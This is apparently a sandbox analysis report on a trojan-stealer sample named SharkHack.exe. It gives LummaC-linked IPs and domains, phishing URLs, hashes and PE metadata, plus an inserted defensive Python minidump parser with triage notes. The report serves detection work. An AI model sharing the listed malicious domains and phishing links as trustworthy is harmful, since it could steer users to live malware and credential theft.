Number of new started processes analysed:15
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:SharkHack.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@12/5@1/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 91%
                                                                                                      • Number of executed functions: 190
                                                                                                      • Number of non-executed functions: 30
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45, 20.190.159.0
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: SharkHack.exe
Time | Type | Description
12:45:30 | API Interceptor | 766694x Sleep call for process: SharkHack.exe modified
12:46:54 | API Interceptor | 12x Sleep call for process: InstallUtil.exe modified
12:47:00 | API Interceptor | 2x Sleep call for process: AddInProcess32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.64.143 | random.exe | malicious | LummaC |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
aliveindu.click | random.exe | malicious | LummaC | 104.21.64.143

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Active_Setup.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | Set-up.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | #Setup.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | setup.msi | malicious | Unknown | 104.21.0.151
CLOUDFLARENETUS | https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188 | malicious | KnowBe4 | 104.17.25.14
CLOUDFLARENETUS | random.exe | malicious | LummaC | 104.21.64.143
CLOUDFLARENETUS | https://tepco-jp-lin;.%5Dshop/co/tepco | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857 | malicious | KnowBe4 | 104.18.87.62
CLOUDFLARENETUS | BHgwhz3lGN.exe | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | UmotQ1qjLq.exe | malicious | LummaC | 104.21.96.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Active_Setup.exe | malicious | LummaC | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | Set-up.exe | malicious | LummaC | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | #Setup.exe | malicious | LummaC | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | LummaC | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | UmotQ1qjLq.exe | malicious | LummaC | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | PI1EA8P74K.exe | malicious | LummaC | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | eXbhgU9.exe | malicious | LummaC | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | universityform.xlsm | malicious | Unknown | 104.21.64.143
a0e9f5d64349fb13191bc781f81f42e1 | Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | malicious | DBatLoader, FormBook | 104.21.64.143
                                                                                                        No context
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 17:46:56 2024, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):183700
                                                                                                        Entropy (8bit):4.0435478722921046
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:pN0/IHuBojR3pN4uE2aOdzLTgpA1/BOyFSVXkoUDAe7yI1Q6CDitT6VKyESIQX0H:pNDH4uEqdzLTgpA/Fy0oVf8i
                                                                                                        MD5:0F504A156644B0CB412B145AAAB49457
                                                                                                        SHA1:0E4E705BDE646215FE51B0BA7BAC1AECC0C8BF4B
                                                                                                        SHA-256:0F69A03C588A243B35F8A839019D154C953D155B7C1482D8F7405C01581B2DD9
                                                                                                        SHA-512:D00C2560C2748EFEA998D16F97C642D3C15367846C37CF0E9F04C9B5FBF673BD34B13DAFC3BF84F020BB75CF42376C13774A8C590DF10DEA0886EF96FA13FBCC
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:MDMP..a..... .........rg........................l...........$...........T...~=..........`.......8...........T...........p'..$...........(...........................................................................................eJ..............GenuineIntel............T.......X...n.rg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
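The dropped file above is a WerFault minidump ("MDMP" magic, 15 streams per the file-type line). A dump left behind by a crashing malware process is evidence worth keeping, but it is also attacker-influenced input, so it should be parsed with bounds checks rather than trusted. The following is an added example, not code from the Joe Sandbox report: a minimal Python parser for the MINIDUMP_HEADER and stream directory. Only the header layout and MINIDUMP_STREAM_TYPE constants come from the Windows SDK; the sample dump bytes are constructed here to mirror the report's 15-stream count, and the version high word in it is an arbitrary value.

```python
import struct

# MINIDUMP_HEADER and MINIDUMP_DIRECTORY layouts from the Windows SDK
# (minidumpapiset.h); every field is little-endian.
#   Signature (DWORD)          'MDMP' = 0x504D444D
#   Version (DWORD)            low word 0xA793, high word implementation-specific
#   NumberOfStreams (DWORD)
#   StreamDirectoryRva (RVA)   file offset of the MINIDUMP_DIRECTORY array
#   CheckSum (DWORD)
#   TimeDateStamp (DWORD)
#   Flags (ULONG64)            MINIDUMP_TYPE bits
MINIDUMP_SIGNATURE = 0x504D444D
MINIDUMP_VERSION = 0xA793
HEADER_FMT = "<IIIIIIQ"
HEADER_SIZE = struct.calcsize(HEADER_FMT)        # 32 bytes
DIR_ENTRY_FMT = "<III"                           # StreamType, DataSize, Rva
DIR_ENTRY_SIZE = struct.calcsize(DIR_ENTRY_FMT)  # 12 bytes

# MINIDUMP_STREAM_TYPE values that matter for triage.
STREAM_NAMES = {
    3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
    6: "ExceptionStream", 7: "SystemInfoStream", 8: "ThreadExListStream",
    9: "Memory64ListStream", 10: "CommentStreamA", 11: "CommentStreamW",
    12: "HandleDataStream", 13: "FunctionTableStream",
    14: "UnloadedModuleListStream", 15: "MiscInfoStream",
    16: "MemoryInfoListStream", 17: "ThreadInfoListStream",
    18: "HandleOperationListStream", 19: "TokenStream",
}


def parse_minidump(data: bytes) -> dict:
    """Parse the header and stream directory, refusing anything out of bounds.

    Every RVA and size is checked against len(data) before use: a crafted
    dump can point the directory outside the file or claim millions of streams.
    """
    if len(data) < HEADER_SIZE:
        raise ValueError("shorter than MINIDUMP_HEADER")
    sig, version, n_streams, dir_rva, _checksum, timestamp, flags = \
        struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MINIDUMP_SIGNATURE:
        raise ValueError(f"bad signature 0x{sig:08x} (expected 'MDMP')")
    if (version & 0xFFFF) != MINIDUMP_VERSION:
        raise ValueError(f"unexpected version 0x{version & 0xFFFF:04x}")
    dir_end = dir_rva + n_streams * DIR_ENTRY_SIZE
    if dir_rva < HEADER_SIZE or dir_end > len(data):
        raise ValueError("stream directory outside the file")
    streams = []
    for i in range(n_streams):
        stype, size, rva = struct.unpack_from(
            DIR_ENTRY_FMT, data, dir_rva + i * DIR_ENTRY_SIZE)
        if rva + size > len(data):
            raise ValueError(f"stream {i} (type {stype}) points outside the file")
        streams.append({"type": STREAM_NAMES.get(stype, f"Unknown({stype})"),
                        "size": size, "rva": rva})
    return {"number_of_streams": n_streams, "timestamp": timestamp,
            "flags": flags, "streams": streams}


def build_sample_dump(stream_types) -> bytes:
    """Constructed stand-in for a real dump: valid header, directory, 4 bytes per stream."""
    n = len(stream_types)
    dir_rva = HEADER_SIZE
    data_rva = dir_rva + n * DIR_ENTRY_SIZE
    # 0x0061A793: correct low word, arbitrary high word (assumption, not a real value).
    header = struct.pack(HEADER_FMT, MINIDUMP_SIGNATURE, 0x0061A793, n, dir_rva, 0, 0, 0)
    directory = b"".join(struct.pack(DIR_ENTRY_FMT, t, 4, data_rva + 4 * i)
                         for i, t in enumerate(stream_types))
    payload = b"\x00\x00\x00\x00" * n
    return header + directory + payload


# Constructed sample with the same stream count (15) as the WerFault dump in the report.
SAMPLE_STREAM_TYPES = [7, 3, 4, 5, 6, 15, 16, 17, 8, 12, 13, 14, 10, 11, 19]
SAMPLE_DUMP = build_sample_dump(SAMPLE_STREAM_TYPES)

if __name__ == "__main__":
    info = parse_minidump(SAMPLE_DUMP)
    print(f"{info['number_of_streams']} streams")
    for s in info["streams"]:
        print(f"  {s['type']:<28} size={s['size']:<6} rva=0x{s['rva']:x}")
```

On a real dump from the WER report folder, the ExceptionStream and ModuleListStream are the ones to read first: they give the faulting address and the loaded-module list at crash time, which for an injected process (InstallUtil.exe or AddInProcess32.exe here) shows which module the crash fell in.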
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8342
                                                                                                        Entropy (8bit):3.6968573429082787
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:R6l7wVeJtOh6nu6YR36J3gmfid40Ipr+89bRosfv87m:R6lXJ06u6YB65gmfM40aRbfvt
                                                                                                        MD5:03BDF1C738462AFB49E44B7EFE1259EC
                                                                                                        SHA1:1078DEE3DA6FAE2611C191DBB435B63362705419
                                                                                                        SHA-256:7FF629FEEB984CE28BB84412AA01EBCB4456DBE0529D8F5742D5E9708F177EB4
                                                                                                        SHA-512:32666A4C75357F173B8BB58492C0B39481ACBB56A7ED2459ADF38DBA5DD5CBC30000AA0DC1174362F931FAB169471DF62E93C35DF51C13D75894E158620767DD
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.4.<./.P.i.
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4676
                                                                                                        Entropy (8bit):4.4778658379168865
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwWl8zs5EJg77aI9EPWpW8VYtYm8M4JnfjFd2+q8rQ2lZR6em9d:uIjfoI7Ke7VxJ/2olZAem9d
                                                                                                        MD5:47769FA59CE029B92EDD4621A51A012D
                                                                                                        SHA1:16CEF4DA3623DE1290A97FA1409FD2D56F0607B1
                                                                                                        SHA-256:BA65132048DAA0B4E167DC2FD8F40876B0CFA5EE1A759D389E2802C4BFC127D2
                                                                                                        SHA-512:F7637E1C7D65660741CDA0A5AA24C4C7F3D5511625796A2A456EB11D0ED5BA25CC6C86A5BCB396365D26A7B7F17A80C04D793D710F5D6E5EA10F6904FABCAAF6
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="654289" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
                                                                                                        MD5:EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
                                                                                                        SHA1:B2A052ACB64FC7173E568E1520AA4D713C5E90A3
                                                                                                        SHA-256:50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
                                                                                                        SHA-512:D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
                                                                                                        Malicious:false
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                        Process:C:\Users\user\Desktop\SharkHack.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
                                                                                                        MD5:EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
                                                                                                        SHA1:B2A052ACB64FC7173E568E1520AA4D713C5E90A3
                                                                                                        SHA-256:50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
                                                                                                        SHA-512:D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
                                                                                                        Malicious:true
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.309365550243163
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        File name:SharkHack.exe
                                                                                                        File size:7'181'824 bytes
                                                                                                        MD5:af8f4b24943a56c36283c58af92a66d2
                                                                                                        SHA1:97d2342d59a890a5c1645efeb275e3ad4f061f78
                                                                                                        SHA256:35bfacbefd16ff1a1b942c068a3509ab21b08b830b30ebf659fe83a6d6c8817c
                                                                                                        SHA512:a48e5f7dd95e74dfa85c4d2672f32c55160e659666a6370afb0d05dfb51a899459c127a8e53af1736cc230c0fdc2b48d2c04ce0a8c53e922c0c749972aa07c2a
                                                                                                        SSDEEP:98304:hzjqYyXE93kfPo9/f0VO/ATX49tpaw0evffz9Ura1pUN5GrqDfTndUbf+W7:J0XECf2sVJInrfz8a1ItDfTdUbf+W7
                                                                                                        TLSH:8D76331567C24054F97F5B74887930441239BCA2BCBACF7E69DB622CCD319629B39723
                                                                                                        Icon Hash:0e0fcdce6c3b0f8c
                                                                                                        Entrypoint:0xab57be
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x4CA20790 [Tue Sep 28 15:19:44 2010 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(the bytes that follow the entrypoint jump are zero padding, which the disassembler renders as a long run of add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6b5770 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6b6000 | 0x25944 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6dc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x6b37c4 | 0x6b3800 | a05707858d4d4d39c0497ba0bd0a78dd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6b6000 | 0x25944 | 0x25a00 | bd969c7530b9d4ce630e9d3c7bd98813 | False | 0.23192223837209303 | data | 5.366841848822205 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6dc000 | 0xc | 0x200 | 9a8678fcd8678a73e3e9ef755eb593d0 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x6b6ef4 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | | | 0.3961038961038961
RT_CURSOR | 0x6b7028 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | | | 0.31493506493506496
RT_CURSOR | 0x6b715c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0x6b7290 | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0x6b73c4 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0x6b74f8 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0x6b762c | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0x6b7760 | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0x6b7894 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0x6b79c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0x6b7b98 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0x6b7d7c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0x6b7f4c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0x6b811c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0x6b82ec | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0x6b84bc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0x6b868c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0x6b885c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0x6b8a2c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0x6b8bfc | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0x6b8ce4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | | | 0.296028880866426
RT_ICON | 0x6b958c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m | | | 0.24210339524429197
RT_DIALOG | 0x6c9db4 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0x6c9e08 | 0x224 | data | | | 0.4835766423357664
RT_STRING | 0x6ca02c | 0x1d8 | data | | | 0.510593220338983
RT_STRING | 0x6ca204 | 0x2c | data | | | 0.5227272727272727
RT_STRING | 0x6ca230 | 0x230 | data | | | 0.475
RT_STRING | 0x6ca460 | 0x398 | data | | | 0.43043478260869567
RT_STRING | 0x6ca7f8 | 0x420 | data | | | 0.38636363636363635
RT_STRING | 0x6cac18 | 0x458 | data | | | 0.4064748201438849
RT_STRING | 0x6cb070 | 0x348 | data | | | 0.4035714285714286
RT_STRING | 0x6cb3b8 | 0x3c0 | data | | | 0.3416666666666667
RT_STRING | 0x6cb778 | 0x274 | data | | | 0.4538216560509554
RT_STRING | 0x6cb9ec | 0x61c | data | | | 0.3414322250639386
RT_STRING | 0x6cc008 | 0x230 | data | | | 0.42142857142857143
RT_STRING | 0x6cc238 | 0x1f4 | data | | | 0.444
RT_STRING | 0x6cc42c | 0x100 | data | | | 0.56640625
RT_STRING | 0x6cc52c | 0x5f4 | data | | | 0.3615485564304462
RT_STRING | 0x6ccb20 | 0x100 | data | | | 0.56640625
RT_STRING | 0x6ccc20 | 0x12c | data | | | 0.5633333333333334
RT_STRING | 0x6ccd4c | 0x19c | data | | | 0.5194174757281553
RT_STRING | 0x6ccee8 | 0x658 | data | | | 0.3368226600985222
RT_STRING | 0x6cd540 | 0x49c | data | | | 0.3652542372881356
RT_STRING | 0x6cd9dc | 0x514 | data | | | 0.3830769230769231
RT_STRING | 0x6cdef0 | 0x59c | data | | | 0.3565459610027855
RT_STRING | 0x6ce48c | 0x198 | data | | | 0.44607843137254904
RT_STRING | 0x6ce624 | 0xe4 | data | | | 0.5657894736842105
